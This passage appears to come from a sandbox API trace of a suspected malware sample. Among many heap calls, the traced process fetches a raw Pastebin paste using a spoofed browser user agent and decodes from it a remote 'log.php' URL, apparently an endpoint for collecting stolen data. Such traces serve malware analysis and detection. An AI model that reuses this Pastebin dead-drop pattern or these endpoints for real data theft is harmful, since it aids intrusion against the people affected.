RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca18f8 [0262.184] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a678 | out: hHeap=0xc60000) returned 1 [0262.184] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e078 [0262.184] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a678 [0262.184] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79ad8 [0262.185] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6d8 | out: hHeap=0xc60000) returned 1 [0262.185] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0262.185] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b78 [0262.185] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e1e0 [0262.185] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6d8 [0262.185] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b88 [0262.185] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0262.185] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b88 | out: hHeap=0xc60000) returned 1 [0262.185] CoInitialize (pvReserved=0x0) returned 0x1 [0262.185] CoUninitialize () [0262.185] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x3c) returned 0xc9b120 [0262.185] CLSIDFromProgID (in: lpszProgID="winhttp.winhttprequest.5.1", lpclsid=0xc9b138 | out: lpclsid=0xc9b138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0 [0262.190] CoCreateInstance (in: rclsid=0xc9b138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x5, riid=0xc9b148*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x91f6c8 | out: ppv=0x91f6c8*=0xcadc30) returned 0x0 [0262.202] WinHttpRequest:IUnknown:QueryInterface (in: This=0xcadc30, riid=0x322c9c*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x91f698 | out: ppvObject=0x91f698*=0x0) returned 0x80004002 [0262.202] WinHttpRequest:IUnknown:QueryInterface (in: This=0xcadc30, riid=0x322c4c*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x91f698 | out: ppvObject=0x91f698*=0x0) returned 0x80004002 [0262.202] WinHttpRequest:IUnknown:QueryInterface (in: This=0xcadc30, riid=0x322c0c*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc9b128 | out: ppvObject=0xc9b128*=0xcadc30) returned 0x0 [0262.202] WinHttpRequest:IUnknown:Release (This=0xcadc30) returned 0x1 [0262.202] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a510 [0262.202] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a498 [0262.202] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a498 | out: hHeap=0xc60000) returned 1 [0262.202] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79af0 | out: hHeap=0xc60000) returned 1 [0262.203] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a6d8 | out: hHeap=0xc60000) returned 1 [0262.203] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e1e0 | out: hHeap=0xc60000) returned 1 [0262.203] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0262.203] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e1e0 [0262.203] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a6d8 [0262.203] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b78 [0262.203] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79af0 [0262.203] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a498 [0262.203] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a510 | out: hHeap=0xc60000) returned 1 [0262.203] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0262.203] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca18d8 [0262.203] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a510 [0262.203] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b38 [0262.203] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a4b0 [0262.203] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b18 [0262.203] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e488 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a4c8 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a450 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a468 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a480 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a408 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a420 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a438 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a3c0 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a3d8 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a3f0 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b48 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a378 [0262.204] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b48 | out: hHeap=0xc60000) returned 1 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e4b0 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a390 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a3a8 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b48 [0262.204] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a378 | out: hHeap=0xc60000) returned 1 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b28 [0262.204] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e4d8 [0262.204] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e4d8 | out: hHeap=0xc60000) returned 1 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b28 | out: hHeap=0xc60000) returned 1 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a378 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc9b318 [0262.205] PeekMessageW (in: lpMsg=0x91f1dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f1dc) returned 0 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e4d8 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a330 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b28 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a348 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b28 | out: hHeap=0xc60000) returned 1 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a360 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a348 | out: hHeap=0xc60000) returned 1 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a330 | out: hHeap=0xc60000) returned 1 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e4d8 | out: hHeap=0xc60000) returned 1 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc733f0 | out: hHeap=0xc60000) returned 1 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc850e0 | out: hHeap=0xc60000) returned 1 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a360 | out: hHeap=0xc60000) returned 1 [0262.205] PeekMessageW (in: lpMsg=0x91f1dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f1dc) returned 0 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xc850e0 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a360 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc850e0 | out: hHeap=0xc60000) returned 1 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e4d8 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a330 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850e0 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a348 [0262.205] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2e8 [0262.205] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a360 | out: hHeap=0xc60000) returned 1 [0262.206] PeekMessageW (in: lpMsg=0x91f1dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f1dc) returned 0 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b28 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e500 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a360 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b08 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e528 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a300 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1af8 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a318 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1ae8 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xccd3d8 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2a0 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1ad8 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xce3938 [0262.206] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2a0 | out: hHeap=0xc60000) returned 1 [0262.206] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xccd3d8 | out: hHeap=0xc60000) returned 1 [0262.206] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ae8 | out: hHeap=0xc60000) returned 1 [0262.206] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1af8 | out: hHeap=0xc60000) returned 1 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xce39e8 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1af8 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2a0 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1ae8 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2b8 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1ac8 [0262.206] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2d0 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1ab8 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a258 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1aa8 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a270 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a98 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a288 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a88 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a210 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a78 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a228 [0262.207] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a68 [0262.207] InternetCrackUrlW (in: lpszUrl="http://pastebin.com/raw.php?i=7MDswaSn", dwUrlLength=0x26, dwFlags=0x0, lpUrlComponents=0x91eb28 | out: lpUrlComponents=0x91eb28) returned 1 [0262.277] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2d0 | out: hHeap=0xc60000) returned 1 [0262.277] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9f1f8 [0262.277] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a288 | out: hHeap=0xc60000) returned 1 [0262.277] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9f248 [0262.277] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a210 | out: hHeap=0xc60000) returned 1 [0262.277] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9f270 [0262.277] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x28) returned 0xc9c480 [0262.277] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1c68 [0262.277] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a228 | out: hHeap=0xc60000) returned 1 [0262.277] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xcaffe0 [0262.277] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9c480 | out: hHeap=0xc60000) returned 1 [0262.277] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1c68 | out: hHeap=0xc60000) returned 1 [0262.277] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0262.277] InternetSetOptionW (hInternet=0x0, dwOption=0x32, lpBuffer=0x91eb70, dwBufferLength=0x8) returned 1 [0262.278] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x91eb7c | out: lpBuffer=0x0, lpdwBufferLength=0x91eb7c) returned 0 [0262.391] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a948 [0262.391] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0xd7a948, lpdwBufferLength=0x91eb7c | out: lpBuffer=0xd7a948, lpdwBufferLength=0x91eb7c) returned 1 [0262.391] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a948 | out: hHeap=0xc60000) returned 1 [0262.391] InternetConnectW (hInternet=0xcc0004, lpszServerName="pastebin.com", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0262.392] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/raw.php?i=7MDswaSn", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0262.393] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0263.310] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x91eb30, lpdwBufferLength=0x91eb28, lpdwIndex=0x91eb2c*=0x0 | out: lpBuffer=0x91eb30*, lpdwBufferLength=0x91eb28*=0x4, lpdwIndex=0x91eb2c*=0x0) returned 1 [0263.311] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x5, lpBuffer=0x91eb4c, lpdwBufferLength=0x91eb78, lpdwIndex=0x91eb7c*=0x0 | out: lpBuffer=0x91eb4c, lpdwBufferLength=0x91eb78, lpdwIndex=0x91eb7c*=0x0) returned 0 [0263.311] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x91eab0 | out: lpCharType=0x91eab0) returned 1 [0263.311] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x91eb2c, dwFlags=0x0, dwContext=0x0) returned 1 [0263.311] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2b) returned 0xedf188 [0263.311] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xedf188, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x91eb30 | out: lpBuffer=0xedf188*, lpdwNumberOfBytesRead=0x91eb30*=0x2b) returned 1 [0263.311] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe9d370 [0263.311] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe24e10 [0263.311] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2b) returned 0xedf1c0 [0263.311] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xedf1c0, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x91eb30 | out: lpBuffer=0xedf1c0*, lpdwNumberOfBytesRead=0x91eb30*=0x0) returned 1 [0263.311] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xedf1c0 | out: hHeap=0xc60000) returned 1 [0263.311] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0263.311] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcaffe0 | out: hHeap=0xc60000) returned 1 [0263.311] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a68 | out: hHeap=0xc60000) returned 1 [0263.311] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9f270 | out: hHeap=0xc60000) returned 1 [0263.311] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a78 | out: hHeap=0xc60000) returned 1 [0263.311] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9f248 | out: hHeap=0xc60000) returned 1 [0263.311] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a88 | out: hHeap=0xc60000) returned 1 [0263.311] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a270 | out: hHeap=0xc60000) returned 1 [0263.311] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a98 | out: hHeap=0xc60000) returned 1 [0263.311] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a258 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1aa8 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9f1f8 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ab8 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2b8 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ac8 | out: hHeap=0xc60000) returned 1 [0263.312] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1ac8 [0263.312] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2b) returned 0xcaffe0 [0263.312] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0263.312] InternetCloseHandle (hInternet=0xcc0008) returned 0 [0263.312] CloseHandle (hObject=0x0) returned 0 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xedf188 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe24e10 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe9d370 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a2a0 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ae8 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xce39e8 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1af8 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xce3938 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ad8 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a318 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a300 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e528 | out: hHeap=0xc60000) returned 1 [0263.312] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b08 | out: hHeap=0xc60000) returned 1 [0263.312] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2c) returned 0xedf188 [0263.312] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b08 [0263.312] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x58) returned 0xe3cd38 [0263.313] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1ad8 [0263.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xedf188, cbMultiByte=44, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0263.313] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x58) returned 0xe3cdf8 [0263.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xedf188, cbMultiByte=44, lpWideCharStr=0xe3cdf8, cchWideChar=44 | out: lpWideCharStr="https://panicvolunteers.com/bgr/log/log.php") returned 44 [0263.313] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe3cdf8 | out: hHeap=0xc60000) returned 1 [0263.313] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a300 [0263.313] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xedf188 | out: hHeap=0xc60000) returned 1 [0263.313] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b08 | out: hHeap=0xc60000) returned 1 [0263.313] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcaffe0 | out: hHeap=0xc60000) returned 1 [0263.313] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ac8 | out: hHeap=0xc60000) returned 1 [0263.313] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a360 | out: hHeap=0xc60000) returned 1 [0263.313] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9e500 | out: hHeap=0xc60000) returned 1 [0263.313] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b28 | out: hHeap=0xc60000) returned 1 [0263.313] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc9e500 [0263.313] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a360 [0263.313] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b28 [0263.313] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a318 [0263.313] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a2a0 [0263.313] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a300 | out: hHeap=0xc60000) returned 1 [0263.313] PeekMessageW (in: lpMsg=0x91f1dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f1dc) returned 1 [0263.313] TranslateMessage (lpMsg=0x91f1dc) returned 0 [0263.313] DispatchMessageW (lpMsg=0x91f1dc) returned 0x0 [0263.313] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7158 [0263.313] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1ac8 [0263.313] Shell_NotifyIconW (dwMessage=0x1, lpData=0x91e878) returned 1 [0263.314] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7158 | out: hHeap=0xc60000) returned 1 [0263.314] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1ac8 | out: hHeap=0xc60000) returned 1 [0263.314] KillTimer (hWnd=0x50172, uIDEvent=0x1) returned 1 [0263.314] SetTimer (hWnd=0x50172, 